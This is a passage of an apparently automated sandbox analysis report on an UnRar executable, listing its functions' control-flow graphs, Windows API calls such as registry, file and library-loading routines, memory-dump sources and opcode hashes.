                                                            • Instruction ID: 2a418feb21c517f50182ac588fba59650b9de5c7bfdbe1844c7c9d339a93577a
                                                            • Opcode Fuzzy Hash: 2d39152e319951bd1ce4e438e6835127e6fa2b428a3d4c3c04c044c153d60f78
                                                            • Instruction Fuzzy Hash: ACC1B262A1A782D2FA10BB25D4401BCA361FF41B94F825171DAAD07AF9DF3DE556C320
                                                            Function 00007FF7AACD223C Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 124registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00001000,00007FF7AACD0E37), ref: 00007FF7AACD229D
                                                            • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00001000,00007FF7AACD0E37), ref: 00007FF7AACD22CA
                                                            • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00001000,00007FF7AACD0E37), ref: 00007FF7AACD2317
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00001000,00007FF7AACD0E37), ref: 00007FF7AACD233B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$CloseOpen
                                                            • String ID: AppData$AppData$Software\WinRAR\Paths
                                                            • API String ID: 1586453840-1988337141
                                                            • Opcode ID: ed497a8cbe7806ce1d9b93360197fb11ffa709cb20c2f162745bbb1ca0ccaf8d
                                                            • Instruction ID: 12e2dd0eb3f4775ec6edf909b4ee0076b1eeb75521e114dcea9bb5cb070dc45f
                                                            • Opcode Fuzzy Hash: ed497a8cbe7806ce1d9b93360197fb11ffa709cb20c2f162745bbb1ca0ccaf8d
                                                            • Instruction Fuzzy Hash: 9E51B432B16B52C5FB10EB64E8406ADB364FB44B94F815271EE6D13BA9DF38E582C310
                                                            Function 00007FF7AACDF4CC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2388 7ff7aacdf4cc-7ff7aacdf4fe 2389 7ff7aacdf500-7ff7aacdf506 2388->2389 2390 7ff7aacdf56b 2388->2390 2389->2390 2392 7ff7aacdf508-7ff7aacdf51e call 7ff7aace23f8 2389->2392 2391 7ff7aacdf572-7ff7aacdf57f 2390->2391 2393 7ff7aacdf5c5-7ff7aacdf5c8 2391->2393 2394 7ff7aacdf581-7ff7aacdf584 2391->2394 2402 7ff7aacdf554 2392->2402 2403 7ff7aacdf520-7ff7aacdf552 GetProcAddressForCaller GetProcAddress 2392->2403 2397 7ff7aacdf5e2-7ff7aacdf5eb GetCurrentProcessId 2393->2397 2399 7ff7aacdf5ca-7ff7aacdf5cc 2393->2399 2396 7ff7aacdf586-7ff7aacdf58b 2394->2396 2394->2397 2405 7ff7aacdf594-7ff7aacdf596 2396->2405 2400 7ff7aacdf5fd-7ff7aacdf617 2397->2400 2401 7ff7aacdf5ed-7ff7aacdf5fb 2397->2401 2404 7ff7aacdf5d5-7ff7aacdf5d7 2399->2404 2401->2400 2401->2401 2406 7ff7aacdf55b-7ff7aacdf569 2402->2406 2403->2406 2404->2400 2407 7ff7aacdf5d9-7ff7aacdf5e0 2404->2407 2405->2400 2408 7ff7aacdf598 2405->2408 2406->2391 2409 7ff7aacdf59f-7ff7aacdf5c3 call 7ff7aacc0bfc call 7ff7aacc1040 call 7ff7aacc0bd0 2407->2409 2408->2409 2409->2400
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                            • API String ID: 1389829785-2207617598
                                                            • Opcode ID: 7ba5d648b7a9a9b8108ee14ce5cf243dd11fc7691fcb84308df272f33f3c63ba
                                                            • Instruction ID: dd5619c6f89fe9c19fb9e9ae021963542e275c5d3a9ba7916c5b613e4e6b51da
                                                            • Opcode Fuzzy Hash: 7ba5d648b7a9a9b8108ee14ce5cf243dd11fc7691fcb84308df272f33f3c63ba
                                                            • Instruction Fuzzy Hash: 69310F20A0BB42C5FA14AF15A950279A750FF44B90F9605B5C8AE477BCEE3CE44AC360
                                                            Function 00007FF7AACC9FD0 Relevance: 9.2, APIs: 6, Instructions: 164filetimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2666 7ff7aacc9fd0-7ff7aacca00b 2667 7ff7aacca016 2666->2667 2668 7ff7aacca00d-7ff7aacca014 2666->2668 2669 7ff7aacca019-7ff7aacca088 2667->2669 2668->2667 2668->2669 2670 7ff7aacca08d-7ff7aacca0b8 CreateFileW 2669->2670 2671 7ff7aacca08a 2669->2671 2672 7ff7aacca0be-7ff7aacca0ee GetLastError call 7ff7aacd252c 2670->2672 2673 7ff7aacca198-7ff7aacca19d 2670->2673 2671->2670 2682 7ff7aacca0f0-7ff7aacca13a CreateFileW GetLastError 2672->2682 2683 7ff7aacca13c 2672->2683 2674 7ff7aacca1a3-7ff7aacca1a7 2673->2674 2676 7ff7aacca1b5-7ff7aacca1b9 2674->2676 2677 7ff7aacca1a9-7ff7aacca1ac 2674->2677 2680 7ff7aacca1df-7ff7aacca1f3 2676->2680 2681 7ff7aacca1bb-7ff7aacca1bf 2676->2681 2677->2676 2679 7ff7aacca1ae 2677->2679 2679->2676 2685 7ff7aacca1f5-7ff7aacca200 2680->2685 2686 7ff7aacca21c-7ff7aacca245 call 7ff7aacf1050 2680->2686 2681->2680 2684 7ff7aacca1c1-7ff7aacca1d9 SetFileTime 2681->2684 2687 7ff7aacca142-7ff7aacca14a 2682->2687 2683->2687 2684->2680 2689 7ff7aacca202-7ff7aacca20a 2685->2689 2690 7ff7aacca218 2685->2690 2691 7ff7aacca183-7ff7aacca196 2687->2691 2692 7ff7aacca14c-7ff7aacca163 2687->2692 2694 7ff7aacca20f-7ff7aacca213 call 7ff7aacb32dc 2689->2694 2695 7ff7aacca20c 2689->2695 2690->2686 2691->2674 2696 7ff7aacca165-7ff7aacca178 2692->2696 2697 7ff7aacca17e call 7ff7aacf0ed4 2692->2697 2694->2690 2695->2694 2696->2697 2699 7ff7aacca246-7ff7aacca24b call 7ff7aacf6404 2696->2699 2697->2691
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3536497005-0
                                                            • Opcode ID: b28dfd38d1f5603dbe78f85ab0ac22f650973a25cfc8560123047e12e41c51ce
                                                            • Instruction ID: a202a7db1d0875ff6d32450d4b562f00a4b195c80acd53dab1240920703924e6
                                                            • Opcode Fuzzy Hash: b28dfd38d1f5603dbe78f85ab0ac22f650973a25cfc8560123047e12e41c51ce
                                                            • Instruction Fuzzy Hash: 0261E362A09781C5F7209F29E40436EA7A2F785BA8F511334DFAE03AE8DF3DD4568714
                                                            Function 00007FF7AACCA840 Relevance: 9.2, APIs: 6, Instructions: 164fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2703 7ff7aacca840-7ff7aacca873 2704 7ff7aacca875-7ff7aacca877 2703->2704 2705 7ff7aacca87c-7ff7aacca884 2703->2705 2706 7ff7aaccaa6d-7ff7aaccaa91 call 7ff7aacf1050 2704->2706 2707 7ff7aacca886-7ff7aacca894 GetStdHandle 2705->2707 2708 7ff7aacca899-7ff7aacca8a3 2705->2708 2707->2708 2710 7ff7aacca8a5-7ff7aacca8ab 2708->2710 2711 7ff7aacca8f8-7ff7aacca910 WriteFile 2708->2711 2714 7ff7aacca91d-7ff7aacca921 2710->2714 2715 7ff7aacca8ad-7ff7aacca8e3 WriteFile 2710->2715 2712 7ff7aacca914-7ff7aacca917 2711->2712 2712->2714 2716 7ff7aaccaa66-7ff7aaccaa6a 2712->2716 2714->2716 2717 7ff7aacca927-7ff7aacca92a 2714->2717 2715->2712 2718 7ff7aacca8e5-7ff7aacca8f4 2715->2718 2716->2706 2717->2716 2719 7ff7aacca930-7ff7aacca965 GetLastError call 7ff7aaccb22c SetLastError 2717->2719 2718->2715 2720 7ff7aacca8f6 2718->2720 2724 7ff7aacca98f-7ff7aacca9a5 call 7ff7aacc0a70 2719->2724 2725 7ff7aacca967-7ff7aacca975 2719->2725 2720->2712 2731 7ff7aacca9f0-7ff7aaccaa31 call 7ff7aacb33a4 call 7ff7aacc12d0 2724->2731 2732 7ff7aacca9a7-7ff7aacca9b3 2724->2732 2725->2724 2726 7ff7aacca977-7ff7aacca97e 2725->2726 2726->2724 2728 7ff7aacca980-7ff7aacca98a call 7ff7aacc12f0 2726->2728 2728->2724 2731->2716 2740 7ff7aaccaa33-7ff7aaccaa4a 2731->2740 2732->2708 2733 7ff7aacca9b9-7ff7aacca9bb 2732->2733 2733->2708 2735 7ff7aacca9c1-7ff7aacca9eb 2733->2735 2735->2731 2742 7ff7aaccaa61 call 7ff7aacf0ed4 2740->2742 2743 7ff7aaccaa4c-7ff7aaccaa5f 2740->2743 2742->2716 2743->2742 2744 7ff7aaccaa92-7ff7aaccaa97 call 7ff7aacf6404 2743->2744
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleWrite
                                                            • String ID:
                                                            • API String ID: 1958782092-0
                                                            • Opcode ID: 9feef63f2c338450b48a7252146bb4e81200e32049827446f7bcbae2c6bac33c
                                                            • Instruction ID: 133654fbe9c4d48b9fbc724d63597c7c5849833bf7fd696fe0663bdf668e7c85
                                                            • Opcode Fuzzy Hash: 9feef63f2c338450b48a7252146bb4e81200e32049827446f7bcbae2c6bac33c
                                                            • Instruction Fuzzy Hash: 6051B862A1A642C2FA60AF25E40467EE361FB44FD0F861171DA9E53AB4DF3CD542C710
                                                            Function 00007FF7AACE23F8 Relevance: 9.2, APIs: 6, Instructions: 154libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2748 7ff7aace23f8-7ff7aace245c call 7ff7aacbd23c GetSystemDirectoryW 2751 7ff7aace2465-7ff7aace248a 2748->2751 2752 7ff7aace245e-7ff7aace2460 2748->2752 2754 7ff7aace248d-7ff7aace2495 2751->2754 2753 7ff7aace25c9-7ff7aace25d0 2752->2753 2756 7ff7aace25d2-7ff7aace25e5 2753->2756 2757 7ff7aace2601-7ff7aace2627 call 7ff7aacf1050 2753->2757 2754->2754 2755 7ff7aace2497-7ff7aace24b0 call 7ff7aacb33a4 2754->2755 2767 7ff7aace24b4-7ff7aace24bb 2755->2767 2760 7ff7aace25fc call 7ff7aacf0ed4 2756->2760 2761 7ff7aace25e7-7ff7aace25fa 2756->2761 2760->2757 2761->2760 2765 7ff7aace2628-7ff7aace262d call 7ff7aacf6404 2761->2765 2770 7ff7aace262e-7ff7aace2633 call 7ff7aacf6404 2765->2770 2767->2767 2769 7ff7aace24bd-7ff7aace24e4 call 7ff7aacb33a4 call 7ff7aacd2edc 2767->2769 2779 7ff7aace24e6-7ff7aace24f8 2769->2779 2780 7ff7aace2518-7ff7aace2531 2769->2780 2776 7ff7aace2634-7ff7aace2639 call 7ff7aacf6404 2770->2776 2791 7ff7aace263a-7ff7aace263f call 7ff7aacf6404 2776->2791 2784 7ff7aace2513 call 7ff7aacf0ed4 2779->2784 2785 7ff7aace24fa-7ff7aace250d 2779->2785 2781 7ff7aace2533-7ff7aace2545 2780->2781 2782 7ff7aace2565-7ff7aace2584 LoadLibraryExW 2780->2782 2787 7ff7aace2560 call 7ff7aacf0ed4 2781->2787 2788 7ff7aace2547-7ff7aace255a 2781->2788 2789 7ff7aace2586-7ff7aace2598 2782->2789 2790 7ff7aace25b8-7ff7aace25c5 2782->2790 2784->2780 2785->2770 2785->2784 2787->2782 2788->2776 2788->2787 2793 7ff7aace25b3 call 7ff7aacf0ed4 2789->2793 2794 7ff7aace259a-7ff7aace25ad 2789->2794 2790->2753 2793->2790 2794->2791 2794->2793
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$DirectoryLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 4014116897-0
                                                            • Opcode ID: 83b7ec5f64b5b9070ae5e424fdc024dca84094503441953cd71ead5b1cc84582
                                                            • Instruction ID: e335cb40ac498a69c55d83c5d73cebd954b01649bf44444db482fc4617162b8c
                                                            • Opcode Fuzzy Hash: 83b7ec5f64b5b9070ae5e424fdc024dca84094503441953cd71ead5b1cc84582
                                                            • Instruction Fuzzy Hash: 8A51B163F16B42D5FF10EBB4D4542BCA321EB947A4B815371EE6D22AE9EE38D446C310
                                                            Function 00007FF7AACD4B9C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 3075 7ff7aacd4b9c-7ff7aacd4c3d call 7ff7aace2648 call 7ff7aacbdb60 call 7ff7aacc1014 SetErrorMode GetModuleHandleW call 7ff7aacdb230 call 7ff7aacb33a4 call 7ff7aacda054 3088 7ff7aacd4c76-7ff7aacd4c8d call 7ff7aacf0e98 3075->3088 3089 7ff7aacd4c3f-7ff7aacd4c56 3075->3089 3097 7ff7aacd4c8f-7ff7aacd4c92 call 7ff7aacb91d4 3088->3097 3098 7ff7aacd4c9c 3088->3098 3090 7ff7aacd4c71 call 7ff7aacf0ed4 3089->3090 3091 7ff7aacd4c58-7ff7aacd4c6b 3089->3091 3090->3088 3091->3090 3093 7ff7aacd4d9f-7ff7aacd4da7 call 7ff7aacf6404 3091->3093 3103 7ff7aacd4c97-7ff7aacd4c9a 3097->3103 3099 7ff7aacd4c9e-7ff7aacd4cb7 call 7ff7aacba6e4 3098->3099 3105 7ff7aacd4cc9-7ff7aacd4ce5 call 7ff7aacba6e4 3099->3105 3106 7ff7aacd4cb9-7ff7aacd4cbc call 7ff7aacbca28 3099->3106 3103->3099 3112 7ff7aacd4cee-7ff7aacd4d0c call 7ff7aace47c0 call 7ff7aacbd650 3105->3112 3113 7ff7aacd4ce7-7ff7aacd4ce9 call 7ff7aace280c 3105->3113 3109 7ff7aacd4cc1-7ff7aacd4cc4 call 7ff7aacba8bc 3106->3109 3109->3105 3119 7ff7aacd4d0e-7ff7aacd4d12 3112->3119 3120 7ff7aacd4d18 3112->3120 3113->3112 3119->3120 3121 7ff7aacd4d14-7ff7aacd4d16 3119->3121 3122 7ff7aacd4d1a-7ff7aacd4d2b call 7ff7aacb9fec call 7ff7aacbaaf8 3120->3122 3121->3122 3126 7ff7aacd4d30-7ff7aacd4d4f call 7ff7aacb1c48 call 7ff7aacf0ed4 3122->3126 3132 7ff7aacd4d51-7ff7aacd4d58 3126->3132 3133 7ff7aacd4d6c-7ff7aacd4d9c call 7ff7aacbd650 call 7ff7aacf1050 3126->3133 3132->3133 3135 7ff7aacd4d5a-7ff7aacd4d63 call 7ff7aace280c 3132->3135 3135->3133 3140 7ff7aacd4d65-7ff7aacd4d67 call 7ff7aace2740 3135->3140 3140->3133
                                                            APIs
                                                              • Part of subcall function 00007FF7AACE2648: GetModuleHandleW.KERNEL32(?,?,?,00007FF7AACD4BC6), ref: 00007FF7AACE265C
                                                              • Part of subcall function 00007FF7AACE2648: GetProcAddress.KERNEL32(?,?,?,00007FF7AACD4BC6), ref: 00007FF7AACE2674
                                                              • Part of subcall function 00007FF7AACE2648: GetProcAddress.KERNEL32(?,?,?,00007FF7AACD4BC6), ref: 00007FF7AACE269F
                                                            • SetErrorMode.KERNELBASE ref: 00007FF7AACD4BDE
                                                            • GetModuleHandleW.KERNEL32 ref: 00007FF7AACD4BE6
                                                              • Part of subcall function 00007FF7AACDB230: GetVersionExW.KERNEL32 ref: 00007FF7AACDB311
                                                              • Part of subcall function 00007FF7AACDB230: LoadLibraryExW.KERNELBASE ref: 00007FF7AACDB344
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACD4D9F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion_invalid_parameter_noinfo_noreturn
                                                            • String ID: rar.lng
                                                            • API String ID: 2496962413-2410228151
                                                            • Opcode ID: 9177278a2134e7d21367c49a1326082cdd6f4549e7a8adf39d74ed32eade6c2d
                                                            • Instruction ID: 1af010fb9488fb1321cf126c4ec45240e5e61372d94b4ebf6a2b312d68a2a54f
                                                            • Opcode Fuzzy Hash: 9177278a2134e7d21367c49a1326082cdd6f4549e7a8adf39d74ed32eade6c2d
                                                            • Instruction Fuzzy Hash: FA51B021A1B742C2FA14BB21E41037DE350EF95B84F9611B5EA9D077FADE2DE442C720
                                                            Function 00007FF7AACC9E30 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 3143 7ff7aacc9e30-7ff7aacc9e51 3144 7ff7aacc9e53-7ff7aacc9e5e GetStdHandle 3143->3144 3145 7ff7aacc9e62-7ff7aacc9e7f ReadFile 3143->3145 3144->3145 3146 7ff7aacc9edf 3145->3146 3147 7ff7aacc9e81-7ff7aacc9e8b call 7ff7aacc9fa0 3145->3147 3148 7ff7aacc9ee3-7ff7aacc9ef7 3146->3148 3151 7ff7aacc9ea5-7ff7aacc9ea9 3147->3151 3152 7ff7aacc9e8d-7ff7aacc9e96 3147->3152 3154 7ff7aacc9eab-7ff7aacc9eb4 GetLastError 3151->3154 3155 7ff7aacc9eba-7ff7aacc9ebe 3151->3155 3152->3151 3153 7ff7aacc9e98-7ff7aacc9ea3 call 7ff7aacc9e30 3152->3153 3153->3148 3154->3155 3157 7ff7aacc9eb6-7ff7aacc9eb8 3154->3157 3158 7ff7aacc9ec0-7ff7aacc9ec8 3155->3158 3159 7ff7aacc9eda-7ff7aacc9edd 3155->3159 3157->3148 3158->3159 3161 7ff7aacc9eca-7ff7aacc9ed3 GetLastError 3158->3161 3159->3148 3161->3159 3162 7ff7aacc9ed5-7ff7aacc9ed8 3161->3162 3162->3153
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleRead
                                                            • String ID:
                                                            • API String ID: 2244327787-0
                                                            • Opcode ID: c02d44e9d936ff1de122f90b0d65e1120e6c6839826f6b2cd92f2c34210acf56
                                                            • Instruction ID: 7b9a7c0eff724aff4a51a4d8d6cd259eeeae8ee6979712b763bfefd9eefd8415
                                                            • Opcode Fuzzy Hash: c02d44e9d936ff1de122f90b0d65e1120e6c6839826f6b2cd92f2c34210acf56
                                                            • Instruction Fuzzy Hash: C721C821A0A951C5FB70AF11E400239F350FB55B94F9551B8DA6D47BB4CF3ED8428720
                                                            Function 00007FF7AACE2A14 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00007FF7AACE2DA8: ResetEvent.KERNEL32 ref: 00007FF7AACE2DC1
                                                              • Part of subcall function 00007FF7AACE2DA8: ReleaseSemaphore.KERNEL32 ref: 00007FF7AACE2DD7
                                                            • ReleaseSemaphore.KERNEL32 ref: 00007FF7AACE2A40
                                                            • CloseHandle.KERNELBASE ref: 00007FF7AACE2A5F
                                                            • DeleteCriticalSection.KERNEL32 ref: 00007FF7AACE2A76
                                                            • CloseHandle.KERNEL32 ref: 00007FF7AACE2A83
                                                              • Part of subcall function 00007FF7AACE2B28: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF7AACE2A2B,?,?,?,00007FF7AACCD44A,?,?,?), ref: 00007FF7AACE2B2F
                                                              • Part of subcall function 00007FF7AACE2B28: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7AACE2A2B,?,?,?,00007FF7AACCD44A,?,?,?), ref: 00007FF7AACE2B3A
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                            • String ID:
                                                            • API String ID: 502429940-0
                                                            • Opcode ID: 2b165e8ad557bec0e473843de1c9952da14d40c3bc3872041f111a27311d0279
                                                            • Instruction ID: b4dd777d1c6d7129c3e04b1382927dfaf97b24e29620c5872e1e5051df8100f5
                                                            • Opcode Fuzzy Hash: 2b165e8ad557bec0e473843de1c9952da14d40c3bc3872041f111a27311d0279
                                                            • Instruction Fuzzy Hash: E0014033A15E81D2F658AB21E54466DB320FB88B80F414171DBAE53625CF38E4B2C750
                                                            Function 00007FF7AACDB230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
